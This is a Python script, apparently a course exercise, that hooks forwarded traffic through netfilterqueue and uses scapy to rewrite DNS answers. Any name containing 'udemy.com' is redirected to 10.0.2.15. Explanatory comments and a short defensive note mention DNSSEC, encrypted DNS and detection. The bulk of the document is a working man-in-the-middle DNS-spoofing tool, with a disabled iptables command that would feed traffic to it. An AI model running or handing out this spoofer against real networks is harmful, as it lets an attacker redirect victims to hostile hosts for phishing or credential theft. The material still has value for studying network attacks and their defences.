- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- import subprocess
def process_packet(packet):
    """Inspect one packet taken from the NFQUEUE and hand it back to the kernel.

    The raw payload is parsed as an IP packet with scapy. When it carries a
    DNS answer (DNSRR) whose question name contains the hard-coded string,
    the answer section is replaced by a single record pointing at a fixed
    address and the packet is re-serialised. Every packet, modified or not,
    is accepted at the end.

    Args:
        packet: queue entry supplied by netfilterqueue; this function uses
            its get_payload(), set_payload() and accept() methods.
    """
    # NOTE(review): the listing lost its indentation; the nesting below is
    # reconstructed so that accept() runs for every packet, since a packet
    # without a verdict would otherwise stay held in the queue - confirm
    # against the original file.

    # get_payload() returns raw bytes; wrapping them in scapy.IP gives access
    # to the individual layers and their fields.
    ip_pkt = scapy.IP(packet.get_payload())

    # DNSRR = resource record (answer), DNSQR = question record (request).
    if ip_pkt.haslayer(scapy.DNSRR):
        # qname is the name that was asked for. Indexing DNSQR assumes the
        # response echoes the question section.
        queried_name = ip_pkt[scapy.DNSQR].qname

        # Substring test, not an exact match: any queried name containing
        # this text takes the branch.
        if 'udemy.com' in queried_name.decode():
            print('[+] Spoofing target..')

            dns_layer = ip_pkt[scapy.DNS]
            # Replace the answer section with one record: rrname repeats the
            # queried name, rdata is the address returned for it.
            # Defensive note: the rewritten answer carries no signature, so
            # DNSSEC validation of a signed zone rejects it, and lookups made
            # over DNS-over-TLS/HTTPS are not plaintext DNS this code can
            # parse. A private (RFC 1918) address returned for a public name
            # is also a usable detection signal.
            dns_layer.an = scapy.DNSRR(rrname=queried_name, rdata='10.0.2.15')
            # ancount must agree with the number of answers now present.
            dns_layer.ancount = 1

            # len and chksum in the IP and UDP headers no longer match the
            # edited packet; deleting them makes scapy recompute both when
            # the packet is serialised.
            for layer in (scapy.IP, scapy.UDP):
                del ip_pkt[layer].len
                del ip_pkt[layer].chksum

            # Write the rebuilt bytes back into the queued packet.
            packet.set_payload(bytes(ip_pkt))

    # Release the packet to the kernel so forwarding continues.
    packet.accept()
# The queue only receives traffic once an iptables rule sends forwarded
# packets to NFQUEUE number 0. The author left the call that installs it
# disabled:
#subprocess.call('iptables -I FORWARD -j NFQUEUE --queue-num 0', shell=True)

# Must equal the --queue-num value used in that iptables rule.
NFQUEUE_NUM = 0

# Attach to the kernel queue; process_packet is invoked once for every packet
# held in it.
queue = netfilterqueue.NetfilterQueue()
queue.bind(NFQUEUE_NUM, process_packet)
# Blocks and dispatches packets until the process is interrupted.
queue.run()